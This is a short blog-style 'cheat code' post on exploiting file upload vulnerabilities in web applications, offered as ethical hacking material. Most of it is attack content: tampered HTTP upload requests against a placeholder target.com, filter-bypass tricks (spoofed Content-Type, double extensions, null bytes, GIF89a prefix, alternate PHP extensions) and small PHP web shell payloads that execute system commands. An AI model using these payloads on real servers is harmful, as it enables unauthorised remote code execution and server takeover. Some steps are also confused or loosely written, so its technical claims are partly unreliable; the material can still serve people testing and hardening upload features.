Cheat code for file upload vulnerability by kidnapshadow

kidnapshadowKidnapshadow -

 

File Upload vulnerability

File Upload vulnerability

Introduction

An arbitrary file upload vulnerability is a type of security flaw that allows an attacker to upload malicious files onto a server.

Where to find

In upload file feature, for example upload photo, pdf, file feature.

How to exploit

follow step for find file upload vulnerability.

step1: you have to find any file uploading page on web application.

step2: you direct upload file.

step3: when you upload file it only upload image file.

step4: - you upload file in php format and go to burp suite change extension jpeg or file.php.jpeg.

POST /images/upload/ HTTP/1.1
Host: target.com

Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpeg"
Content-Type: application/x-php

step5: open terminal and set listner to intercept the request. and boom got shell

  1. Change the Content-Type value.
POST /images/upload/ HTTP/1.1
Host: target.com

Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php

Change the Content-Type

POST /images/upload/ HTTP/1.1
Host: target.com

Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/jpeg
  1. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file
POST /images/upload/ HTTP/1.1
Host: target.com
Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
Content-Type: application/x-php---------------------------829348923824

Change the request to this

POST /images/upload/ HTTP/1.1
Host: target.com
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php

2. Upload the payload, but start with GIF89a; and

POST /images/upload/ HTTP/1.1
Host: target.com
...
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/gif
GIF89a; <?php system("id") ?>

And dont forget to change the content-type to image/gif

3. Bypass content length validation, it can be bypassed using small payload

(<?=`$_GET[x]`?>)

4. Using null byte in filename

file.php%00.gif

5. Using double extensions for the uploaded file

file.jpg.php1

6. Uploading an unpopular php extensions (php4,php5,php6,phtml)

file.php5

7. Try to randomly capitalizes the file extension

file.pHP5
Kidnapshadow

Hey everyone, This side sidharth cybersecurity | ethical hacking https://medium.com/@kidnapshadow

Previous Post Next Post